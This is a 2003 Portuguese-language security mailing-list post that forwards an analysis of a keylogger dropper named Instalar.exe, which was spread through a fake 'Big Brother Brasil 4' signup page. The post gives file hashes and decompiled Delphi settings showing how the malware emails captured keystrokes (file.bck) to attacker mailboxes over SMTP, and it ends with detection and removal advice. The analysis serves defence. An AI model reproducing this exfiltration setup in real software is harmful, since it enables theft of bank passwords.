[SECURITY-L] Artefato Instalar.exe BBB4

Daniela Regina Barbetti Silva daniela em ccuec.unicamp.br
Qua Jun 18 09:29:18 -03 2003 

Pessoal,

   Vem crescendo o numero de programas "keylogger" que estao circulando
   pela rede. Depois de instalado na maquina do usuario tudo o que e' 
   digitado e' capturado. A intencao e' obter senhas de bancos e/ou outros
   sistemas que envolvam senhas. 

   Vale alertar, novamente, os usuarios sobre arquivos attachados.

Daniela


----- Forwarded message from Jarbas de Freitas Peixoto <jarbas em acmesecurity.org> -----

From: "Jarbas de Freitas Peixoto" <jarbas em acmesecurity.org>
Subject: [GTS-L] Artefato Instalar.exe BBB4
To: gts-l em listas.unesp.br
Date: Tue, 17 Jun 2003 20:54:48 -0300
X-mailer: Pegasus Mail for Windows (v4.11)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Senhores, 

Ultimamente, o Laboratório ACME! tem recebido muitas perguntas a respeito 
de um "artefato malicioso" chamado Instalar.exe, que usualmente chega até 
você por email "SPAM" uma página chamada "Big Brother Brasil 4 FAÇAM 
SUAS INSCRIÇÕES!!!". Assunto já discutido nessa calorosa lista.

- -------
Análise publicada em https://forum.acmesecurity.org/viewtopic.php?t=360
- -------

O programa Instalar.exe visa capturar informações de senhas de usuários de 
bancos e outros sistemas que envolvam senhas. 

Algumas evidências encontradas: 

O programa Instalar.exe (md5sum - 6f12e67d792b30bfb9ca74e055be105e) é 
na verdade um instalador (self-extractor) do artefato própriamente dito 
Msdosdll.exe (made in Delphi). O conteúdo do instalador é: 

b8d289aabcbcb16d9393fedf28c0fb65   *file.bck 
dc302596bc79a15836cc54f79d932b4f  *Ios.EXE 
5baebb99bcefbb1c8292da6bb7843b37 *KeyChar.dll 
5cea960368d9b223571851d064138071 *kt_dll.dll 
81051bcc2cf1bedf378224b0a93e2877  *list.txt 
3fa05f86bfa4e28bcd67ea55d8e6a12b   *Msdosdll.exe 
285b1db9b0b8afb1aaee84205843d42d *MsdosDll.INI 
81051bcc2cf1bedf378224b0a93e2877  *winsee32.ver 

A função do artefato Msdosdll.exe é muito parecida com a do Msnbc32.exe 
(outro artefato Certificado_digital.exe em 
https://forum.acmesecurity.org/viewtopic.php?t=348 ) 

Dentro do programa Msdosdll.exe foi encontrada várias strings com nomes de 
bancos e funções para capturar os pressionamentos de teclas do usuário. 

Fazendo análise do arquivo Ios.exe observa-se para onde estão sendo 
enviados os pressionamentos. 

"Descompilando" o arquivo Ios.exe observamos: 

.... cortes para fim de brevidade .... 

end 
object Sm: TNMSMTP 
Host = 'smtp.terra.com.br' 
Port = 25 
TimeOut = 800000 
ReportLevel = 0 
UserID = 'Jose manoel' 
PostMessage.FromAddress = 'caixa.linck10 em terra.com.br' 
PostMessage.FromName = 'spider' 
PostMessage.ToAddress.Strings = ( 
'caixa.linck10 em terra.com.br') 
PostMessage.ToBlindCarbonCopy.Strings = ( 
'') 
PostMessage.Attachments.Strings = ( 
'c:\windows\system\file.bck') 
PostMessage.Subject = 'Big_Virtual' 
PostMessage.LocalProgram = 'c:\windows\system' 
EncodeType = uuMime 
ClearParams = True 
SubType = mtPlain 
Charset = 'us-ascii' 
Left = 80 
Top = 64 
end 
object bc: TBackupFile 
Version = '5.10' 
BackupMode = bmAll 
CompressionLevel = clFastest 
RestoreMode = rmAll 
MaxSize = 0 
SetArchiveFlag = False 
RestoreFullPath = False 
SaveFileID = False 
Left = 80 
Top = 32 
end 
object sm1: TNMSMTP 
Host = 'smtp.uol.com.br' 
Port = 25 
TimeOut = 800000 
ReportLevel = 0 
UserID = 'Jose manoel' 
PostMessage.FromAddress = 'w9z em uol.com.br' 
PostMessage.FromName = 'spider' 
PostMessage.ToAddress.Strings = ( 
'w9zw9z em uol.com.br') 
PostMessage.ToBlindCarbonCopy.Strings = ( 
'') 
PostMessage.Attachments.Strings = ( 
'c:\windows\system\file.bck') 
PostMessage.Subject = 'Our_2_Virtual' 
PostMessage.LocalProgram = 'c:\windows\system' 
EncodeType = uuMime 
ClearParams = True 
SubType = mtPlain 
Charset = 'us-ascii' 
Left = 20 
Top = 6 
end 
end 


Há também variação do instalador (instalar.exe) md5sum  - 
196f712158d23211309a300133073614 *Instalar.exe 

Conteúdo da variação: 

b8d289aabcbcb16d9393fedf28c0fb65 *file.bck 
8206c564be094697ceeb2b664b2cd097 *Ios.EXE   << mudança 
5baebb99bcefbb1c8292da6bb7843b37 *KeyChar.dll 
5cea960368d9b223571851d064138071 *kt_dll.dll 
81051bcc2cf1bedf378224b0a93e2877 *list.txt 
3fa05f86bfa4e28bcd67ea55d8e6a12b *Msdosdll.exe 
285b1db9b0b8afb1aaee84205843d42d *MsdosDll.INI 
81051bcc2cf1bedf378224b0a93e2877 *winsee32.ver 


Observando essa variação constatou-se que a mudança é apenas no arquivo 
Ios.exe - arquivo que contém os emails para onde deverão ser enviados os 
pressionamentos de teclas. 

Descompilando e análisando Ios.exe da variação constatamos a mudança do 
email do destinatário: 

.... cortes para fim de brevidade .... 

object Sm: TNMSMTP 
Host = 'smtp.terra.com.br' 
Port = 25 
TimeOut = 800000 
ReportLevel = 0 
UserID = 'Jose manoel' 
PostMessage.FromAddress = 'progtelecom.1 em terra.com.br' 
PostMessage.FromName = 'spider' 
PostMessage.ToAddress.Strings = ( 
'progtelecom.1 em terra.com.br') 
PostMessage.ToBlindCarbonCopy.Strings = ( 
'') 
PostMessage.Attachments.Strings = ( 
'c:\windows\system\file.bck') 
PostMessage.Subject = 'Big_Virtual' 
PostMessage.LocalProgram = 'c:\windows\system' 
EncodeType = uuMime 
ClearParams = True 
SubType = mtPlain 
Charset = 'us-ascii' 
Left = 80 
Top = 64 
end 
object bc: TBackupFile 
Version = '5.10' 
BackupMode = bmAll 
CompressionLevel = clFastest 
RestoreMode = rmAll 
MaxSize = 0 
SetArchiveFlag = False 
RestoreFullPath = False 
SaveFileID = False 
Left = 80 
Top = 32 
end 
object sm1: TNMSMTP 
Host = 'smtp.uol.com.br' 
Port = 25 
TimeOut = 800000 
ReportLevel = 0 
UserID = 'Jose manoel' 
PostMessage.FromAddress = 'w9z em uol.com.br' 
PostMessage.FromName = 'spider' 
PostMessage.ToAddress.Strings = ( 
'ispont em uol.com.br') 
PostMessage.ToBlindCarbonCopy.Strings = ( 
'') 
PostMessage.Attachments.Strings = ( 
'c:\windows\system\file.bck') 
PostMessage.Subject = 'Our_2_Virtual' 
PostMessage.LocalProgram = 'c:\windows\system' 
EncodeType = uuMime 
ClearParams = True 
SubType = mtPlain 
Charset = 'us-ascii' 
Left = 20 
Top = 6 
end 
end 

- ----------- 

Perguntas freqüentes: 

- - Como minha máquina é infectada?
Na verdade, não se trata de um vírus ou worn que "infecta". Trata-se de um 
"keylogger" (capturador de pressionamentos) e ao clicar em instalar.exe você 
estará instalando, ou seja, copiando os arquivos Msdosdll.exe, keychar.dll, 
Msdosdll.exe, Msdosdll.INI, winsee32.ver e file.bck para o seu sistema 
fazendo as entradas no registro para que ele execute automaticamente. 

- - Como saber se o keylogger está na minha máquina? 
Faça uma busca por Msdosdll.exe, keychar.dll, Msdosdll.exe, Msdosdll.INI, 
winsee32.ver e file.bck ... ou olhe em C:\...\... e procure esses arquivos. :-/ {PRIVATE "TYPE=PICT;ALT=icon_rolleyes.gif"}

- - Como resolver? 
Remover esses arquivos (inclusive suas entradas no registro) ou mais 
"garantido" reinstalar o equipamento comprometido. 

- --------- 

Até mais, 

Jarbs 


=============================
          Jarbas de Freitas Peixoto
          jarbas em acmesecurity.org
ACME! Computer Security Research
UNESP - São José do Rio Preto - SP
=============================


-----BEGIN PGP SIGNATURE-----
Version: idw's PGP-Frontend 4.9.4 / 5-2003 + PGP 8.0.0

iQA/AwUBPu+qS3xi97baZwFkEQIFbwCggnvnzGw0vkI7IvEKPthQAFPGPZEAn396
ujKB3xs3vKodqdTCvtkhXnBr
=dTD8
-----END PGP SIGNATURE-----

----- End forwarded message -----

Mais detalhes sobre a lista de discussão SECURITY-L